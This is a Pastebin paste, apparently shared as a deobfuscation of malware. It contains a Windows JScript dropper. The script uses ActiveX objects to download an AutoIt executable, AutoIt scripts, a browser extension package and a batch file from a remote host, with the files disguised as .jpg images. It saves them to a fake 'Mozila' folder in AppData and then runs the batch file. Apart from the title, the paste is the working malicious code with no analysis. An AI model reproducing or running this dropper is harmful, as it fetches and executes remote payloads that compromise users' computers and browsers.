Advertisement
Guest User

deobfuscated by me XD

a guest
Jun 26th, 2016
5,993
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.31 KB | None | 0 0
  1. var _0xe519 = ["Msxml2.XMLhttp", "onreadystatechange", "readyState", "status", "ADODB.Stream", "open", "type", "write", "position", "read", "saveToFile", "close", "GET", "send", "Scripting.FileSystemObject", "WScript.Shell", "Shell.Application", "%APPDATA%\", "ExpandEnvironmentStrings ", "Mozila ", "https: //www.google.com", "http://userexperiencestatics.net/ext/Autoit.jpg", "\autoit.exe", "http://userexperiencestatics.net/ext/bg.jpg", "\bg.js", "http://userexperiencestatics.net/ext/ekl.jpg", "\ekl.au3", "http://userexperiencestatics.net/ext/ff.jpg", "\ff.zip", "http://userexperiencestatics.net/ext/force.jpg", "\force.au3", "http://userexperiencestatics.net/ext/sabit.jpg", "\sabit.au3", "http://userexperiencestatics.net/ext/manifest.jpg", "\manifest.json", "http://userexperiencestatics.net/ext/run.jpg", "\run.bat", "http://userexperiencestatics.net/ext/up.jpg", "\up.au3", "http://whos.amung.us/pingjs/?k=pingjse346", "\ping.js", "http://whos.amung.us/pingjs/?k=pingjse3462", "\ping2.js", ""];
  2. (function(_0xc4a4x1) {
  3. function _0xc4a4x2(_0xc4a4x2, _0xc4a4x3, _0xc4a4x4) {
  4. if (!_0xc4a4x3 || !_0xc4a4x2) {
  5. return null
  6. };
  7. var _0xc4a4x5 = WScript.CreateObject(_0xe519[0]);
  8. _0xc4a4x5[_0xe519[1]] = function() {
  9. if (_0xc4a4x5[_0xe519[2]] === 4 && _0xc4a4x5[_0xe519[3]] === 200) {
  10. xa = new ActiveXObject(_0xe519[4]);
  11. xa[_0xe519[5]]();
  12. xa[_0xe519[6]] = 1;
  13. xa[_0xe519[7]](_0xc4a4x5.ResponseBody);
  14. xa[_0xe519[8]] = _0xc4a4x4;
  15. stm2 = new ActiveXObject(_0xe519[4]);
  16. stm2[_0xe519[6]] = 1;
  17. stm2[_0xe519[5]]();
  18. stm2[_0xe519[7]](xa[_0xe519[9]]());
  19. stm2[_0xe519[10]](_0xc4a4x3, 2);
  20. stm2[_0xe519[11]]();
  21. xa[_0xe519[11]]()
  22. }
  23. };
  24. _0xc4a4x5[_0xe519[5]](_0xe519[12], _0xc4a4x2, false);
  25. _0xc4a4x5[_0xe519[13]](null)
  26. }
  27.  
  28. function _0xc4a4x6(_0xc4a4x7, _0xc4a4x8) {
  29. {
  30. xa = new ActiveXObject(_0xe519[4]);
  31. xa[_0xe519[5]]();
  32. xa[_0xe519[6]] = 1;
  33. xa.LoadFromFile(_0xc4a4x7);
  34. ix = new ActiveXObject(_0xe519[4]);
  35. ix[_0xe519[5]]();
  36. ix[_0xe519[6]] = 1;
  37. ix.LoadFromFile(_0xc4a4x8);
  38. stm2 = new ActiveXObject(_0xe519[4]);
  39. stm2[_0xe519[6]] = 1;
  40. stm2[_0xe519[5]]();
  41. stm2[_0xe519[7]](ix[_0xe519[9]]());
  42. stm2[_0xe519[7]](xa[_0xe519[9]]());
  43. xa[_0xe519[11]]();
  44. ix[_0xe519[11]]();
  45. stm2[_0xe519[10]](_0xc4a4x7, 2);
  46. stm2[_0xe519[11]]()
  47. }
  48. }
  49. fso = new ActiveXObject(_0xe519[14]);
  50. var _0xc4a4x9 = new ActiveXObject(_0xe519[15]);
  51. _0xc4a4x1 = new ActiveXObject(_0xe519[16]);
  52. FileDestr = _0xc4a4x9[_0xe519[18]](_0xe519[17]);
  53. mozklasor = FileDestr + _0xe519[19];
  54. if (!fso.FolderExists(mozklasor)) {
  55. fso.CreateFolder(mozklasor)
  56. };
  57. _0xc4a4x1.ShellExecute(_0xe519[20]);
  58. _0xc4a4x2(_0xe519[21], mozklasor + _0xe519[22], 0);
  59. _0xc4a4x2(_0xe519[23], mozklasor + _0xe519[24], 0);
  60. _0xc4a4x2(_0xe519[25], mozklasor + _0xe519[26], 0);
  61. _0xc4a4x2(_0xe519[27], mozklasor + _0xe519[28], 0);
  62. _0xc4a4x2(_0xe519[29], mozklasor + _0xe519[30], 0);
  63. _0xc4a4x2(_0xe519[31], mozklasor + _0xe519[32], 0);
  64. _0xc4a4x2(_0xe519[33], mozklasor + _0xe519[34], 0);
  65. _0xc4a4x2(_0xe519[35], mozklasor + _0xe519[36], 0);
  66. _0xc4a4x2(_0xe519[37], mozklasor + _0xe519[38], 0);
  67. _0xc4a4x2(_0xe519[39], mozklasor + _0xe519[40], 0);
  68. _0xc4a4x2(_0xe519[41], mozklasor + _0xe519[42], 0);
  69. _0xc4a4x1.ShellExecute(mozklasor + _0xe519[36], _0xe519[43], mozklasor, _0xe519[43], 0)
  70. })(this)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement